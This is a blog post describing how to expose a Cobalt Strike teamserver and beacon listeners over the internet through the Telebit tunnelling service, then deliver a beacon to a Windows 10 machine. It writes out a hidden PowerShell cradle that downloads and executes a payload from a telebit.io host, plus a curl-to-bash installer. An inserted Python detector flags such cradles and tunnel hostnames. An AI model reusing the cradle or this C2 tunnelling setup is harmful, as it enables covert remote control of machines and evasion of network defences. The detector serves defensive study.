
CobaltStrike Over WAN Connection

 ·  ☕ 1 min read  ·  🐱 thik

Below is my own approach to connecting to the Teamserver and issuing commands through Beacons remotely, without needing to set up port forwarding.

Requirements

  • CobaltStrike
  • Telebit

Telebit Setup

Note: visit telebit.cloud to learn more about the configuration.

On Linux, open a Terminal window and type the following command:

# Install Telebit
curl https://get.telebit.io/ | bash

Install Telebit

After entering your email address, go to your inbox, open the link that was sent to you, and enter the 4-digit number shown there to verify.

Verify Code

Verified

If nothing goes wrong, we will receive a success confirmation message like the one below:

Usage

Usage

Let's go! Now configure the port numbers used to connect to the Teamserver and the Beacons.

# Set up the Teamserver port
~/telebit tcp 50050

# Set up the HTTP Beacon
~/telebit http 80  # don't change the port

Teamserver/Beacon Setup

Teamserver Connection

Next, type the following command to start the Teamserver:

sudo ./teamserver x.x.x.x your_password

Start Teamserver

Now we try connecting to the Teamserver using the IP address of telebit.cloud, as shown below:

Connect To Teamserver

Make sure the IP address (you can get it by pinging telebit.cloud), the port number, and the password are correct before clicking Connect.

CobaltStrike Connected

Success! We have now connected to the Teamserver.

Adding HTTP/HTTPS Listener

Below is how to start a Listener remotely using the HTTP protocol.

HTTP Listener

Because Telebit redirects to HTTPS, we also need to start one more Listener of type HTTPS.

Start the HTTPS Listener as shown below:

HTTPS Listener

Generate Beacon

The configuration above is now complete, so we can try generating a Beacon to connect.
In this demonstration we will use the Scripted Web Delivery attack.

HTTP Beacon

Note: once it has been generated, modify a few parts of it, such as the protocol and the port, as shown below:

// By default it will download from port 80 without https
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://shy-impala-40.telebit.io:80/foo'))"

// Then we have to remove the port and add https instead
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://shy-impala-40.telebit.io/foo'))"
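
As a defensive counterpart to the command above, the following added example (not part of the original post) flags process command lines that combine a PowerShell download cradle with a tunnel-service hostname. The suffix list, the function names, and the sample events are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: tunnel-service suffixes worth watching; telebit.io is the one on this page.
TUNNEL_SUFFIXES = (".telebit.io", ".telebit.cloud")

# Download-cradle indicators taken from the command line shown above (case-insensitive).
CRADLE_PATTERNS = {
    "no_profile": re.compile(r"\s-nop(rofile)?\b", re.I),
    "hidden_window": re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download_string": re.compile(r"\.downloadstring\s*\(", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)

def tunnel_hosts(cmdline):
    """Return hostnames in the command line that sit under a watched tunnel suffix."""
    hosts = []
    for url in URL_RE.findall(cmdline):
        host = (urlparse(url).hostname or "").lower()
        if host.endswith(TUNNEL_SUFFIXES):  # suffix match, so telebit.io.example.net is ignored
            hosts.append(host)
    return hosts

def score_event(cmdline):
    """Alert only when PowerShell downloads and executes content from a tunnel host."""
    hits = sorted(n for n, rx in CRADLE_PATTERNS.items() if rx.search(cmdline))
    hosts = tunnel_hosts(cmdline)
    executes_download = {"download_string", "invoke_expression"} <= set(hits)
    alert = "powershell" in cmdline.lower() and executes_download and bool(hosts)
    return {"alert": alert, "indicators": hits, "tunnel_hosts": hosts}

# Constructed process-creation command lines (hostnames are placeholders).
SAMPLE_EVENTS = [
    "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient)"
    ".downloadstring('https://placeholder-host-1.telebit.io/foo'))\"",
    "powershell.exe -NoProfile -Command \"Get-ChildItem C:\\Users\"",
    "curl.exe https://placeholder-host-2.telebit.io/status",
]

def triage(events):
    """Return the events that should be escalated."""
    return [e for e in events if score_event(e)["alert"]]

if __name__ == "__main__":
    for event in triage(SAMPLE_EVENTS):
        print("ALERT", score_event(event))
```

Only the first sample is escalated: the second has no tunnel URL and the third reaches a tunnel host without a PowerShell cradle.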

Execute

We tested running it on Windows 10 Pro x64, as shown in the image below:

Exec Powershell

Switching back to the CobaltStrike management console, we receive the Beacon connection from that Windows 10 machine.

C2 Connected

WRITTEN BY
thik
Security Researcher